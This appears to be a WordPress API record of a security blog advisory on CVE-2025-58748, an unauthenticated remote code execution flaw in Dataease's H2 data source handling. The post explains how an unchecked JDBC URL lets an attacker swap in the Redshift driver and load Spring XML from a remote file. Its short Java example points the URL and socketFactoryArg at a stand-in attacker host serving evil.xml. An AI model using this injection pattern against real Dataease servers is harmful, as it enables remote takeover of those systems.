{"id":76069,"date":"2025-09-22T14:28:24","date_gmt":"2025-09-22T14:28:24","guid":{"rendered":""},"modified":"2025-10-05T06:15:36","modified_gmt":"2025-10-05T12:15:36","slug":"cve-2025-58748-critical-remote-code-execution-vulnerability-in-dataease-software","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-58748-critical-remote-code-execution-vulnerability-in-dataease-software\/","title":{"rendered":"<strong>CVE-2025-58748: Critical Remote Code Execution Vulnerability in Dataease Software<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>Dataease, a popular open-source data analytics and visualization platform, has been identified to contain a critical security vulnerability (CVE-2025-58748) that could expose systems to remote code execution. This vulnerability, present in versions up to 2.10.12, has far-reaching implications, threatening the security and integrity of data and systems where the application is deployed.<br \/>\nThe severity of the issue is underscored by the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-7775-critical-memory-overflow-vulnerability-in-netscaler-adc-and-gateway-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"83836\">potential for system<\/a> compromise and data leakage, which could lead to significant operational disruption and financial loss for affected organizations. As such, this vulnerability warrants immediate attention and remediation.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-58748<br \/>\nSeverity: Critical (9.8\/10)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: None<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-0074-critical-remote-code-execution-vulnerability-in-sdp-discovery\/\"  data-wpil-monitor-id=\"83558\">Remote Code Execution<\/a>, Potential System Compromise, Data Leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-3764683735\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>Dataease | Up to and including 2.10.12<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-8067-udisks-daemon-vulnerability-leading-to-potential-system-compromise-or-data-leakage\/\"  data-wpil-monitor-id=\"85733\">vulnerability resides in the H2 data<\/a> source implementation (H2.java). Specifically, the software fails to validate that a provided JDBC URL starts with jdbc:h2. This oversight enables an attacker to craft a JDBC configuration that substitutes the Amazon Redshift driver. Furthermore, the attacker can leverage the socketFactory and socketFactoryArg parameters to invoke org.springframework.context.support.FileSystemXmlApplicationContext or ClassPathXmlApplicationContext with a <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24404-xml-injection-remote-code-execution-vulnerability-in-apache-hertzbeat\/\"  data-wpil-monitor-id=\"88957\">remote XML<\/a> resource under their control. This manipulation results in <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-22403-remote-code-execution-vulnerability-in-sdp-discovery-cc\/\"  data-wpil-monitor-id=\"83878\">remote code execution<\/a>, which could lead to full system compromise.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-2545210498\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Below is a conceptual example of how the vulnerability might be exploited:<\/p>\n<pre><code class=\"\" data-line=\"\">\/\/ Attacker-controlled JDBC config\nString jdbcUrl = &quot;jdbc:redshift:\/\/malicious-server.com\/dbname&quot;;\nString socketFactory = &quot;org.springframework.context.support.FileSystemXmlApplicationContext&quot;;\nString socketFactoryArg = &quot;http:\/\/malicious-server.com\/evil.xml&quot;;\n\/\/ The application blindly trusts the provided config\nConnection conn = DriverManager.getConnection(jdbcUrl, props);<\/code><\/pre>\n<p>In this example, the attacker has substituted the legitimate JDBC URL with a malicious one pointing to their server. Furthermore, they have specified a malicious XML resource via the socketFactoryArg parameter. When the application attempts to establish a connection using this configuration, it will inadvertently <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52353-arbitrary-code-execution-vulnerability-in-badaso-cms-2-9-11\/\"  data-wpil-monitor-id=\"83947\">execute the attacker&#8217;s code<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview Dataease, a popular open-source data analytics and visualization platform, has been identified to contain a critical security vulnerability (CVE-2025-58748) that could expose systems to remote code execution. This vulnerability, present in versions up to 2.10.12, has far-reaching implications, threatening the security and integrity of data and systems where the application is deployed. The severity [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[80],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-76069","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-rce"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/76069","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=76069"}],"version-history":[{"count":6,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/76069\/revisions"}],"predecessor-version":[{"id":81778,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/76069\/revisions\/81778"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=76069"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=76069"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=76069"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=76069"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=76069"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=76069"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=76069"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=76069"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=76069"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}